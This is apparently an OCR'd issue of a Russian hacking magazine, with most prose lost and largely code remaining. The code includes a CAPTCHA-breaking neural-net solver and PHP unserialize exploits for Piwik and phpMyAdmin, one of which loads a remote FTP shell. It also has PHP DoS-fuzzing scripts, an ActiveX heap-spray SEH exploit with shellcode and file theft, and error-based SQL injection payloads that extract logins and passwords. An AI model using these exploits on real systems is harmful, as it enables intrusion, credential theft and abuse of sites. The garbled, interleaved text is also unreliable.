            + pow(($color1 & 0xFF) - ($color2 & 0xFF), 2));
    }

    // Binary mask of the image: 1 where a pixel differs from the background
    // color by more than 200, 0 otherwise
    protected function update_mask()
    {
        $this->mask = array();
        for ($i = 0; $i < $this->width; $i++)
            for ($j = 0; $j < $this->height; $j++)
                $this->mask[$i][$j] = $this->colordist(imagecolorat($this->image, $i, $j), $this->bg_color) > 200 ? 1 : 0;
    }

, -,
, , -,
.

, ,
.
.
xakep.ru (~19 )
(16x24 ) . , , .
,
.
.

, .
( )
.


, (
). ,
4 ,
,
,
. : x, y (
) d
.
, .
, ,
,
. :

( ).
,
( ).
,
.
,
,
.
, . ,
(,
).


() ,
. ,
. ,
..
x, y d, .
:
// Fitness of a candidate (x, y, d): the number of mask pixels that fall
// inside the digit cells placed at offset (x, y) with skew d
public function test_dna($array)
{
    $fitness = 0;
    for ($d = 0; $d < $this->digits_quantity; $d++)
        for ($i = 0; $i < $this->digit_width; $i++)
            for ($j = 0; $j < $this->digit_height; $j++)
            {
                // mask coordinates (x, y) of pixel (i, j) of digit d
                $x = $this->digit_kerning * $d + $i + $array['x'] + round($array['d'] * ($j / $this->digit_height));
                $y = $j + $array['y'];
                if (isset($this->mask[$x][$y]))
                    $fitness += $this->mask[$x][$y];
            }
    return $fitness;
}


,
, .
.
90%
- . 4
(16x24 ):
protected function divide_digits($params)
{
    $this->digits = array();
    for ($i = 0; $i < $this->digits_quantity; $i++)
    {
        // empty image for the i-th digit
        $this->digits[$i]['image'] = imagecreatetruecolor($this->digit_width, $this->digit_height);
        $this->digits[$i]['width'] = $this->digit_width;
        $this->digits[$i]['height'] = $this->digit_height;
        for ($x = 0; $x < $this->digit_width; $x++)
        {
            for ($y = 0; $y < $this->digit_height; $y++)
            {
                // horizontal shift of this row caused by the "skew" d
                $d = round($params['d'] * ($y / $this->digit_height));
                $color = imagecolorat($this->image, $x + $this->digit_kerning * $i + $d + $params['x'], $y + $params['y']);
                imagesetpixel($this->digits[$i]['image'], $x, $y, $color);
            }
        }
    }
}


.
, .
, .
(
). . ,
0 1.
:
. ,
. (feedforward ),
( )
().
( )
(, ).

: , .
. , , ,
,
.
,
Fast Artificial Neural
Network (www.leenissen.dk/fann). ,
. :
// create the network
// parameters:
// 1. layer sizes (input, hidden, output)
// 2. connection rate (1 = fully connected)
// 3. learning rate
$ann = fann_create(array(384, 150, 10), 1, 0.7);
// train the network
// parameters:
// 1. the network
// 2. training set (array of input/output pairs)
// 3. maximum number of epochs
// 4. desired error
// 5. epochs between reports
fann_train($ann, $set, 10000, 0.001, 100);
// run the network on the input vector $input
$output = fann_run($ann, $input);
// save the trained network to a file
fann_save($ann, 'ann.data');
// load a network from a file
$ann = fann_create('ann.data');


384, 150 10 .
() (1624
= 384) , 0 1 ( ), , 10
0 1, :
, , .
, , ,
,
.
,



RAZ0R HTTP://RAZ0R.NAME

, :
function train()
{
$dir = "samples/";
$set = array();
if ($dh = opendir($dir))
{
while (($file = readdir($dh)) !== false)
{
if (filetype($dir.$file) == 'file')
{
$answer = str_replace('.jpg', '', $file);
$xc = new Xakep_CAPTCHA($dir.$file, 'ann.data', 4, $answer);
$out = $xc->parse();
$set []= $xc->sample;
}
}
closedir($dh);
}
$ann = fann_create(array(384, 150, 10), 1, 0.7);
fann_train($ann, $set, 10000, 0.001, 100);
fann_save($ann, 'ann.data');
}

100 43% ,
3% (0.43 ^ 4), .
100 , 55% 10% . ,
1-2
,
10-20 . , , ,

. :
function test()
{
    $dir = "test/";
    $c = 0;
    $wins = 0;
    if ($dh = opendir($dir))
    {
        while (($file = readdir($dh)) !== false)
        {
            if (filetype($dir.$file) == 'file')
            {
                $xc = new Xakep_CAPTCHA($dir.$file, 'ann.data', 4);
                $out = $xc->parse();
                if ($out == str_replace('.jpg', '', $file))
                    $wins++;
                print '<img src="http://localhost/xakep_captcha/test/'.$file.'"> '.$out.'<br><br>';
                flush();
                $c++;
            }
        }
        closedir($dh);
    }
    print $wins.'/'.$c;
}

, ,
, .
,
, . xakep.ru
? -, , ,
. -, ,
,
. -,
6,
.
. , , , ,
SMS ( Google ).
, ,
. ,
,
OpenID-, .z


RECAPTCHA

,
,

reCAPTCHA (recaptcha.net). reCAPTCHA

. ,

,
. ,
, , ,
. reCAPTCHA ,
,
,
.. OCR-. ,
reCAPTCHA
, . reCAPTCHA
,

.


(ocr-research.org.ua)
. ,

,
.
-,

( ). -,

,
, ,
. ,

. ,
,
.
.
,
,
.



mail.ru.

.

.

.
, ,
,
: ,
.


.

, ,

, .

.
:
,

. ,
, mail.ru
.


(
brightcove.newscientist.com/services/player/
bcpid2227271001?bctid=47814603001).
(,
) ,

.
.

,
.


,
. ,
,
.

,

,

. ,
(
),
.
,
.



icq 884888, http://snipper.ru

UNSERIALIZE


, ! ][
PHP
. ,
unserialize .
,
, -
.
!
Piwik phpMyAdmin.
PIWIK

Piwik.
, Piwik -, Google analytics.
phpMyVisites (phpmyvisites.us).
: ( WordPress), API (
xml, json, php, csv),
, ( drag and drop-), , real time-
- (
250 ).
, Piwik
sourceforge.net "Infoworld Bossie Award"
. ,
unserialize Piwik.

ZEND FRAMEWORK

,
PHP- Zend
Framework , ,
unserialize().
, Piwik - :)
,


( 0.4.5
).
./core/Cookie.php :
protected function loadContentFromCookie()
{
    $cookieStr = $_COOKIE[$this->name];
    $values = explode(self::VALUE_SEPARATOR, $cookieStr);
    foreach($values as $nameValue){
        ...
        if(!is_numeric($varValue)){
            $varValue = base64_decode($varValue);
            // some of the values may be serialized array so we try to...
            if(($arrayValue=@unserialize($varValue)) !== false
                // we set the unserialized version only for arrays...
                && is_array($arrayValue)
            )
            {
                $varValue = $arrayValue;
            }
        ...
}

advisory phpMyAdmin

phpMyAdmin


, , , :
"=",
, ;

base64_decode() (, ,
-)
unserialize().

(, )
, Zend Framework.
:)

PDF ,
,
Zend_Log.
./libs/Zend/Log.php
:
public function __destruct()
{
foreach($this->_writers as $writer) {
$writer->shutdown();
}
}


shutdown() , _writers.
shutdown-.
./libs/Zend/Log/Writer/Mail.php:
public function shutdown()
{
    ...
    if (empty($this->_eventsToMail)) {
        return;
    }
    ...
    if ($this->_layout) {
        ...
        // If an exception occurs during rendering, convert it to a notice
        // so we can avoid an exception thrown without a stack frame.
        try {
            $this->_mail->setBodyHtml($this->_layout->render());
        } catch (Exception $e) {
        ...
    try {
        $this->_mail->send();
    } catch (Exception $e) {
    ...
    }
    ...
}

- , ,
e-mail. , .
unserialize-.
-, ,
,
:).
, render.
Piwik_View
./core/View.php:
public function render()
{
    try {
        ...
    } catch(Exception $e) {
        // can fail, for example at installation (no plugin loaded yet)
    }
    ...
    return $this->smarty->fetch($this->template);
}

,
, ,
Smarty .

SMARTY

, Smarty PHP- , .
, fetch() ./libs/
Smarty/Smarty.class.php:
function fetch($resource_name, $cache_id = null, ...)
{
    ...
    if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) {
        if ($this->_is_compiled($resource_name, $_smarty_compile_path)
            || $this->_compile_resource($resource_name, $_smarty_compile_path))
        {
            include($_smarty_compile_path);

piwik.org Piwik
builds.piwik.org/?
C=M;O=D
Piwik
suspekt.org/2009/
12/09/advisory032009-piwikcookie-unserializevulnerability Piwik
Cookie unserialize()
Vulnerability
framework.zend.
com/download
Zend Framework
smarty.net

Smarty
php.net/call_user_
func_array call_
user_func_array()
suspekt.org/
downloads/Piwik_
Smarty.txt
Piwik
Smarty
suspekt.org/
downloads/Piwik_
Config.txt
Piwik
gnucitizen.org/
static/blog/2009/06/
phpmyadminrcesh.
txt phpMyAdmin '/
scripts/setup.php'
PHP Code Injection
RCE PoC v0.11
snipper.ru/view/12/
phpmyadmin2119-unserializearbitrary-php-codeexecution-exploit

phpMyAdmin <= 2.11.9
forum.antichat.ru/
thread99589-file_
exists.html
file_
exists ftp


Piwik
timestamp

advisory

}
} else {
...


_compile_resource :
function _compile_resource($resource_name, $compile_path)
{
    $_params = array('resource_name' => $resource_name);
    if (!$this->_fetch_resource_info($_params))
    {
        return false;
    }

_fetch_
resource_info
:
function _fetch_resource_info(&$params)
{
    ...
    switch ($_resource_type) {
        case 'file':
            ...
            break;
        default:
            // call resource functions to fetch the template source and
            if ($params['get_source'])
            {
                $_source_return = isset($this->_plugins['resource'][$_resource_type])
                    && call_user_func_array($this->_plugins['resource'][$_resource_type][0][0],
                                            array($_resource_name, &$params['source_content'], &$this));
            ...
}

! PHP-
call_user_func_array
callback- :).

call_user_func_
array :
callback-
,
.
PHP :
1. eval(), ,
, ,
call_user_func_array;
2. assert() ( eval)
, ,
3 ,
assert .
-
,
Smarty eval:
function _eval($code, $params=null)
{
    return eval($code);
}


2 ,
.

,
PHP,
,
.
,
(
).

,

base64_encode , , evil-,


PHP- Piwik.

,
unserialize

.

PHPMYADMIN

:).
,
, ,

MySql phpMyAdmin
2.11.9 ( , ,
). ,
./scripts/setup.php
,
. ,
,
./config
( ),
.
.
, ./scripts/setup.php
,
unserialize:
if (isset($_POST['configuration']) && $action != 'clear')
{
    // Grab previous configuration, if it should not be cleared
    $configuration=unserialize($_POST['configuration']);
}

, $_
POST['configuration']
unserialize() ,

__wakeup __destruct.
- ./libraries/Config.
class.php:
, phpinfo() Piwik

function __wakeup() {
    if (! $this->checkConfigSource()
        || $this->source_mtime !== filemtime($this->getSource())
        || $this->default_source_mtime !== filemtime($this->default_source)
        || $this->error_config_file
        || $this->error_config_default_file) {
        $this->settings = array();
        $this->load();
        $this->checkSystem();
    }
    ...
}

,
load().
:
function load($source = null)
{
    ...
    if (! $this->checkConfigSource()) {
        return false;
    }
    ...
    if (function_exists('file_get_contents'))
    {
        $eval_result = eval('?>' . trim(file_get_contents($this->getSource())));
    } else
    {
        $eval_result = eval('?>' . trim(implode("\n", file($this->getSource()))));
    }
    ...
}

, eval-,
PHP-
:).
getSource checkConfigSource:
function getSource() {
    return $this->source;
}
...
function checkConfigSource() {
    ...
    if (! file_exists($this->getSource()))
    {
        ...
        return false;
    }
    if (! is_readable($this->getSource())) {
        ...
        die('Existing configuration file (' . $this->getSource() . ') is not readable.');
    }
    ...
    $perms = @fileperms($this->getSource());
    if (!($perms === false) && ($perms & 2))
    {
        ...
        die('Wrong permissions on configuration file, should not be world writable!');
    }
    return true;
}


, , , . file_exists(), is_readable() fileperms()
file_get_contents() URL PHP . . PHP 5,
ftp, file_exists('ftp://ftp.com/
shell.txt') true. http
. ,
,
unserialize, $_POST['configuration']
( "source"):




Raz0r' raz0r.name/obzory/novyesposoby-obxoda-wafi-php-eksploity.


unserialize-


vBulletin, ,
,

.

O:10:"PMA_Config":1:{s:6:"source";s:70:"ft
p://login:password@tvoy_host.com/www/shell.
txt";}

phpinfo(), shell.txt
ftp- "<? phpinfo();exit; ?>"
(exit; , "Fatal
error").
.

EPIC WIN

, , PHP,
, ! .
( :)

. , ,
unserialize-
,
. ! z



d0znpp http://oxod.ru

,

-

-,
.
,


. , ,

.

CMS, ,
. .


.
,
,
.
, ,
-,
. ,
,
, .
.

,
max_execution_time
500- . -,

.
(


TIFF), .

11 ,
. ,
,
.

Register_Globals=ON.
,
,
,
.

PHP



.
PHP :
max_execution_time
max_input_nesting_level
max_input_time

memory_limit
pcre.backtrack_limit (PHP>=5.2.0)
pcre.recursion_limit (PHP>=5.2.0)
post_max_size (PHP>=4.0.3)
upload_max_filesize
max_file_uploads (PHP>=5.2.12)

, , common :).
( )
php.net/manual/en/ini.list.php. max, limit.
. ,
, :
,
PHP -.
,
, ,
max_execution_time,
memory_limit.
error_reporting=E_
ERROR , display_errors=On.


GET.
max_input_nesting_
level.

max_execution_time

. , ,

.
, , ,
.
, .

64. ,
, .
:

URI MAX LENGTH


MAX_INPUT_NESTING_LEVEL


GET
. , .
, ( ). PHP
:
function fuzz_max_uri_len($url)
{
    $headers = array();
    $data = array();
    $left = 500;    // lower bound of the search interval
    $right = 64000; // upper bound of the search interval
    $accur = 5;     // stop once the interval is narrower than this many bytes
    // binary search for the longest query string the server still accepts
    while (($right-$left) > $accur){
        $cur = intval(($right+$left)/2);
        $data['x'] = str_repeat("x",$cur);
        // sendGetRequest() is defined elsewhere in the PoC (not shown here);
        // it returns the response headers, body and timing
        list($h,$c,$t) = sendGetRequest($url, $headers, $data);
        $s = intval(substr($h,9,3)); // HTTP status code from the status line
        if ($s<400) {
            $left=$cur;
        }
        else{
            $right=$cur;
        }
        echo "\n$cur\t$s";
    }
    return(($right+$left)/2);
}

max_input_nesting_level
,

<?php echo $_GET[a]; ?>.

, , max_input_nesting_level=1 ?a[][], ,
Notice,
, .
2
, Array. ,
,
-
, ,
Array. -
. ,
,
, .
,
:). ,
.
-
,
. PoC
, ,
. ,
.
,

.

oxod.ru ,
,
.
php.net , .


:)


Allowed memory size exhausted. , PHP- <?php echo OK;?>.
, ?!
, . ,
, , .
PHP



GET. , :)

,
, . ,
,
. ,
?a([]x2500 )
1.2 . , ,
, memory_limit,
.
,
:

PoC . ,
,
. 20 .
memory_get_usage().
.
, a
GET. -
1 .
, ,
?a=aaa,
.


GET- (
).
?a[],
500 .
,
max_input_nesting_level.


<?php echo "ONsec E500 mem:".memory_get_usage()."#"; ?>

auto_append_file
php.ini. ,

. :
function findMarker($content)
{
    $p1 = strpos($content, "ONsec E500 mem:");
    if ($p1===false){
        return 0;
    }
    else {
        $p2=strpos($content,"#",$p1);
        if ($p2===false){
            return 0;
        }
        else {
            // the value sits between the 15-byte marker prefix and the "#" terminator
            $mem = substr($content, $p1+15,$p2-$p1-15);
        }
    }
    return intval($mem);
}

.
. ,
,
, .
, .
, POST,
.
PoC
fuzz_memory_usage().
(POST,GET,Multipart)
.

, ,
, .

,

,
, . ,
max_execution_time, .
OWASP,
dead_code. ,
, ,
. ,
-
, ,
, . ,
, . ,
.
, .
,
, .
, ,
,
. -
,
,
. , ,
, ,
, .
,
. ,
,

, . ,
,
-.



GET .

PoC. 30 83
, 126 .

GET .

.
, :
1. , ,
(16^3=4096).
2. , .
3. 250 ,
, . .
,

. Multipart, . -,
, .
20 , , .

,
. :
function parseResults($dir)
{
    if (is_dir($dir))
    {
        if ($dh = opendir($dir))
        {
            $i=0;
            $results = array();
            while (($file = readdir($dh)) !== false)
            {
                $curFile = $dir.$file;
                if (!is_file($curFile)) continue; // skip "." and ".."
                $fh = fopen($curFile, 'r');
                $filedata = fread($fh, filesize($curFile));
                $fsize = filesize($curFile);
                $p1 = strpos($filedata,"Maximum execution time of ");
                if ($p1 === false) {}
                else{
                    // skip "Maximum execution time of NN seconds exceeded in <b>" (52 bytes)
                    $p2 = $p1+52;
                    $p3 = strpos($filedata,"</b>",$p2);
                    if ($p3 === false) {}
                    else{
                        $len = $p3-$p2;
                        $path = substr($filedata,$p2,$len);
                        $unique = true;
                        // keep each script path only once
                        foreach($results as $key=>$value){
                            if ($value['path']==$path){
                                $unique=false;
                                break;
                            }
                        }
                        if ($unique){
                            $len = $p3-$p2;
                            $res = array('path'=>substr($filedata,$p2,$len),'len'=>$fsize);
                            $results[$i]=$res;
                            $i++;
                        }
                    }
                }
                fclose($fh);
            }
            closedir($dh);
            $size=count($results)-1;
            // bubble sort the results by response length
            for ($i = $size; $i>=0; $i--) {
                for ($j = 0; $j<=($i-1); $j++)
                    if ($results[$j]['len']>$results[$j+1]['len']) {
                        $k = $results[$j];
                        $results[$j] = $results[$j+1];
                        $results[$j+1] = $k;
                    }
            }
            return $results;
        }
    }
}

, .
, .
, 126 30 .
. ,
PoC !


. ,
, ,
. ,
, .
, PoC .
. , .
, .z



aka Don_Huan dookie@inbox.ru


ACTIVEX

ActiveX-
. 2006
,
.
ActiveX
COM- Microsoft , ,
DLL
OLE- OCX,
, , , .


HTML <object >,
CLSID. ,
JavaScript-
ActiveXObject(..),
ProgID. CLSID

{11111111-2222-33334444-555555555555}. ProgID , ,
CLSID. CLSID, ProgID COM- .

: HTML
ActiveX ,
( :
XSS
HTML-
..),
.

,
. :
,


,
,


. , ,
, ActiveX
,
,
. ,
, .
,
. ActiveX-
, , .

. , ActiveX CLSID {11111111-2222-3333-4444555555555555}.
,
HKEY_CLASSES_
ROOT\CLSID\{11111111-2222-3333-4444555555555555}
Implemented Categories (
, ,
).

,
.
{7DD95802-9882-11CF-9FA900AA006C42C4}
{7DD95801-9882-11CF-9FA900AA006C42C4}

,
.
, ,
KillBit. -
HKEY_LOCAL_

ActiveX Acrobat Reader


MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{11111111-2222-3333-4444-555555555555}.
Compatibility Flags HEXe
0x00000400 KillBit.
.
, . ,
:
Object not safe for scripting
ActiveX? ,
.
IObjectSafety.

.
INTERFACESAFE_FOR_UNTRUSTED_
CALLER INTERFACESAFE_FOR_UNTRUSTED_DATA,

.

,
.
.
?
,
/++, , .
,
, . , .

Fuzzing-,
COMRaider [labs.idefense.com/
software/fuzzing.php]. , AXman
[digitaloffense.net/tools/axman/],
COMRaider, . ActiveX, .
, IE. , .
, .
,
, ActiveX. ,
,
, , .
. ,
,
.
fuzzing
,


ExecuteCmd()?
, COMRaider.
,
COMRaider
FileMon RegMon. ,
, . COMRaider.
,
View .
Options , Edit
BuildArgs.vbs.
,
Visual Basic-. GetStrArgs(),
.
for i=100 to 10000 step 1000
    parent.strs.add "String(" & i & ", ""A"")"
next

,

ActiveX, .




( !!!)

for i=10000 to 100000 step 10000
    parent.strs.add "String(" & i & ", ""A"")"
next


100 10000 1000. 10000,
100000. 20
.
%s %n
.
:
parent.strs.add """C:\31337.txt"""
parent.strs.add """31337"""
parent.strs.add """http://""+String(10000, ""B"")"
parent.strs.add """C:\""+String(10000, ""B"")"

.
,
.


SEH !

heap spray
Start,
Scan a directory for registered COM servers.

. ,
, ,
.
. ,
.
, COMRaider
,


.
, FileMon
. , ActiveX,


heap spray

,
: %WINDIR%\Downloaded Program
Files. 5000 .
, ,
Bulid Obj Safety Report for Selected
COMRaider
. , .
.
.
. ,
. ,

.
,
, Internet Explorer .
Start Choose from controls that should be
loadable in IE.
.
FileMon RegMon 31337. ,

,
. ,
COMRaidere,

,
Scan Selected For Strings,
file
,path,url,key,load,download,safe,read,write,file,e
xecute .. ( ) . ,
, -



FileMon
COMRaider
parent.strs.add """"&stri&"""" next



Fuzz Selected. COMRaider,
,
,
-.
Begin Fuzzing,
:).


, . , .

emsmtp.dll 6- . , , Oracle Document
Capture (10.1350) (oracle.com/technology/software/products/contentmanagement/index_dc.html), .
, .
Caused Exception,
. , ,
,
, ,
. ,
, EIP
41414141,
, SEH .
,
. ,

.
OllyDBG (ollydbg.de).
COMRaider,


Launch in Olly.
, F9,
.
Olly
,
CMP,
[ESI+180] .
ESI A

""

0x41414141, ,
0x41414141+0x180=0x414142C1
,
. ,
( ).
,
41,
SEH .
, ,
, ,
,
CALL DWORD PTR DS:[ESI+CC],
ESI ,
SEH,
ESI.
, , ,
.
,
,
. ,
.
308 .
, SEH .
, 308 , 4 SEH-.
100 ,
ESI
.
COMRaider, BuildArgs.vbs:
beg=256
stri=String(beg,"0")
letter="A"
for i=(beg+4) to 500 step 4
if letter="Z" then
letter ="A"
end if
stri=stri+String(4,letter)
letter=Chr(Asc(letter)+1)

, 260
, 4
ESI. 4
, 4 ,
.
32- 4 ,
SEH. ,
:
fill= String(260, "X")
parent.strs.add """&fill&"CCCCFFFF
AAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFBBBB"""

:
ESI=CCCC (43434343)
SEH=BBBB (42424242)
=AAAA (41414141)

, ESI,
CCCC , .
SEH-.
,
,
SEH-. ,
, ,
,
, ,
,

. ,

. .
,
.
( IE 6/7,
) .
(exploit-db.com/exploits/10007) SEH-
jmp esp user32.dll.
ESP ( ),
.
user32.dll
. ,

. ,
. -



RAZ0R HTTP://RAZ0R.NAME

heap spray ( , !).


,
- (nop)
.
, iexplorer .
, 99%, , . 0x0d0d0d0d
.
c
JavaScript.
heap spray:
var bigbk=unescape("%u9090%u9090%
u9090%u9090"); //90 nop,

while(bigbk.length<0x40000)
bigbk=bigbk+bigbk; //

//nop nop-slide
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell; //
nop-slide,


.
, unicode-.
. 0xAA
0xBB 0xCC 0xDD JavaScript unicode
%uBBAA %uDDCC.
JavaScript. .
, .
JavaScript :
,
. , , , ,
( perl): C:\>perl shellcodegen.pl exec
notepad. , :
<HTML>
<HEAD>
<TITLE>][akep ActiveX SEH Sploit</
TITLE>
</HEAD>
<BODY>
<OBJECT id='vuln'
classid='clsid:68AC0D5F-0424-11D5822F-00C04F6BA8D9'></object>
<SCRIPT>
function Exploit(){
// exec notepad
var shell = unescape("%ue8fc%u0089
%u0000%u8960%u31e5%u64d2%u528b%u8b3
0%u0c52%u528b%u8b14%u2872%ub70f%u26
4a%uff31%uc031%u3cac%u7c61%u2c02%uc
120%u0dcf%uc701%uf0e2%u5752%u528b%u
8b10%u3c42%ud001%u408b%u8578%u74c0%
u014a%u50d0%u488b%u8b18%u2058%ud301
%u3ce3%u8b49%u8b34%ud601%uff31%uc03
1%uc1ac%u0dcf%uc701%ue038%uf475%u7d
03%u3bf8%u247d%ue275%u8b58%u2458%ud


301%u8b66%u4b0c%u588b%u011c%u8bd3%u
8b04%ud001%u4489%u2424%u5b5b%u5961%
u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86
%u016a%u858d%u00b9%u0000%u6850%u8b3
1%u876f%ud5ff%ue0bb%u2a1d%u680a%u95
a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u7
5e0%ubb05%u1347%u6f72%u006a%uff53%u
6ed5%u746f%u7065%u6461%u0000");
//
// 0x0d0d0d0d c 99%
var bigbk=unescape("%u9090%u9090%u
9090%u9090");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++)
mem[i]=bigbk+shell;
var bf=unescape("%63"); //
var buf="";
while (buf.length<260) buf=buf+bf;
buf+=unescape("%61%61%61%61"); //
ESI
buf+="FFFF"+unescape("%62%62%62%62"
);//
buf+="THX_TO_MY_WIFE_FOR_
LOVE!FFFFFFFF";
buf+=unescape("%0d%0d%0d%0d");//SEH

vuln.SubmitToExpress(buf);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>

, 308 , :
"<260>aaaaFFFFbbbbTHX_TO_
MY_WIFE_FOR_LOVE!FFFFFFFF[ SEH
]". ESI, bbbb
,
.
308 0x0d .
html-,
-
"notepad"
(,
ActiveX ).
, SEH CALL [ESI+CC]
.
:
var mem=new Array();
var i=0;
// c
var bigbk=unescape("%u0d0d%u0d0d%u
0d0d%u0d0d");
while(bigbk.length<0x40000)
bigbk=bigbk+bigbk;
for(; i<200;i++) mem[i]=bigbk+unes
cape("%u0d0d%u0d0d%u0d0d%u0d0d");

// nop-

var bigbk2=unescape("%u9090%u9090%
u9090%u9090");
while(bigbk2.length<0x40000)
bigbk2=bigbk2+bigbk2;
for(; i<400;i++)
mem[i]=bigbk2+shell;
// 0x0d0d0d0d c 99%
var bf=unescape("%63");
var buf="";
while (buf.length<260) buf=buf+bf;
//
//CALL [0x05050505+CC]
//EIP 0x0d0d0d0d.
.
f+=unescape("%05%05%05%05"); //ESI

buf+="FFFF"+unescape("%61%61%61%61"
);//
buf+="HI_TO_KONONENCHEG_
FFFFFFFFFFFFFF";
buf+=unescape("%62%62%62%62");//SEH

vuln.SubmitToExpress(buf);
. . .

, ,
FileMon,
:\31337.txt. ,
ImportBodyText,
,
. ,
,
BodyText:
. . .
vuln.ImportBodyText("C:\boot.ini");
alert(vuln.BodyText);
. . .


,
IE 6/7 ActiveX.

,
,

.

,

. , ,
,
, .
,
, ,

Digital Security Research Group.
research@dsec.ru! z


(Positive Technologies) http://devteev.blogspot.com

ERROR

BASED SQL-INJECTION


ERROR-BASED
SQL-INJECTION

SQL-
, ,

(union).

. ,
?!
, SQL-,

. .
,

, , .

ERROR-BASED BLIND SQL INJECTION MYSQL

Qwazar "
" SQL- ,
MySQL. ,
.

MySQL >= 5.0:


mysql> select 1,2 union select co


unt(*),concat(version(),floor(ran
d(0)*2))x from information_schema.
tables group by x;
ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1
mysql> select 1 and (select 1
from(select count(*),concat(ver
sion(),floor(rand(0)*2))x from
information_schema.tables group by
x)a); ERROR 1062 (23000): Duplicate
entry '5.0.841' for key 1

,
( MySQL < 5.0, ),
,
rand().
, http-.

mysql> select 1 and row(1,1) >


(select count(*),concat(version(),0x
3a,floor(rand()*2))x from (select 1
union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select
count(*),concat(version(),0x3a,floo
r(rand()*2))x from (select 1 union
select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry
'5.0.84:0' for key 1


:
http://server/?id=(1)and(select+1+fr
om(select+count(*),concat((select+ta

blind SQLi MySQL


ble_name+from+information_schema.tables+limit+0
,1),floor(rand(0)*2))x+from+information_schema.
tables+group+by+x)a)-http://server/?id=(1)and(select+1+from(select
+count(*),concat((select+table_name
+from+information_schema.tables+limit+1,1),
floor(rand(0)*2))x+from
+information_schema.tables+group+by+x)a)--

Qwazar MySQL,
3.x, -
. , , MySQL 4.1,
.

, TinKode,
blind SQL-Injection
Web- army.mil.
Web-,
MSSQL 2000/2005,
.
TinKode ,
MSSQL
, "" :
select convert(int,@@version);
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar
value 'Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft
Corporation
Enterprise Edition on Windows NT 6.1
<X86> (Build 7600: ) (VM)
' to data type int.

, SQL-,
,
Microsoft SQL Server. ,
:
http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=1)))-http://server/?id=(1)and(1)=(convert(i
nt,(select+table_name+from(select+row_
number()+over+(order+by+table_
name)+as+rownum,table_name+from+information_
schema.tables)+as+t+where+t.rownum=2)))-...

Qwazar MySQL 3.x!

, Sybase ASE, MS SQL


Server, Transact-SQL,
, HTTP://WWW
.
(.
links
). MSSQL

qwazar.ru/?p=7
Sybase.
tinkode.baywords.
com.
.
, MySQL
,
blind SQL Injection. PostgreSQL ""
:
web=# select cast(version() as numeric);
ERROR: invalid input syntax for type
numeric: "PostgreSQL 8.2.13 on i386portbld-freebsd7.2, compiled by GCC cc
(GCC) 4.2.1 20070719 [FreeBSD]"

SQL
, :
http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+0)+as+numeric)-http://server/?id=(1)and(1)=cast
((select+table_name+from+information_schema.
tables+limit+1+offset+1)+as+numeric)-...

!

!
,

!


SQL-,


BLIND SQLI MSSQL

'<:abcdef>' from dual)) from dual;


ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00110: Warning: invalid QName
":abcdef" (not a Name)
...
SQL>

, .
, .
:

MSSQL

TinKode MSSQL/2008
Oracle. ,

.
, error-based blind SQL
Injection ,
XML. ,
XMLType(),
(LPX-00XXX):
SQL> select XMLType((select
'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00210: expected '<' instead
of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line
301
ORA-06512: at line 1
no rows selected
SQL>

. substr()
. ,
:
select XMLType((select
substr(version,1,1) from
v$instance)) from users;
select XMLType((select


substr(version,2,1) from
v$instance)) from users;
select XMLType((select
substr(version,3,1) from
v$instance)) from users;
... ..

SQL> select * from users where id


= 1 and(1)=(select XMLType((select
'<:abcdef>' from dual)) from
dual);
select * from users where id =
1 and(1)=(select XMLType((select
'<:abcdef>' from dual)) from dual)
ERROR at line 1:
ORA-00932: inconsistent datatypes:
expected NUMBER got -

,
limit offset,

. , XMLType()

XMLTYPE()




SQL-
, ,
.
XMLType(),

,
:
SQL> select XMLType((select
'<abcdef:root>' from dual)) from
dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML
processing
LPX-00234: namespace prefix
"abcdef" is not declared
...
SQL> select XMLType((select

.
,
at ("@") .
;) upper().
, :
select id
rnum from
select id
rnum from
...

from(select id,rownum
users a)where rnum=1;
from(select id,rownum
users a)where rnum=2;

, , ,
hex-. ,



blind SQLi Oracle


blind SQLi PostgreSQL

MSSQL: /?param=1
and(1)=convert(int,@@version)--

blind SQLi Sybase


(ascii),
. ,
:
select * from table where id =
1 and(1)=(select upper(xmltype
(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=1)||chr(62)))
from dual);
select * from table where id =
1 and(1)=(select upper(xmltype
(chr(60)||chr(58)||chr(58)||(s
elect rawtohex(login||chr(58)|
|chr(58)||password)from(select
login,password,rownum rnum from
users a)where rnum=2)||chr(62)))
from dual);
...

http 214 (107


hex-),
Oracle >=9.0 (. ):
http://server/?id=(1)and(1)=(selec
t+upper(xmltype(chr(60)||chr(58)||

chr(58)||(select+rawtohex(login||c
hr(58)||chr(58)||password)from(sel
ect+login,password,rownum+rnum+fro
m+users+a)where+rnum=1)||chr(62)))
from dual)--


SQL , ,

:

Sybase: /?param=1
and(1)=convert(int,@@version)-MySQL>=4.1<5.0: /?param=(1)
and(select 1 from(select count
(*),concat(version(),floor(ran
d(0)*2))x from TABLE_NAME group
by x)a)-
/?param=1 and row(1,1)>(select co
unt(*),concat(version(),0x3a,floor
(rand()*2))x from (select 1 union
select 2)a group by x limit 1)--

SQL> select utl_raw.cast_to_varch


ar2('61646D696E3A3A504073737730726
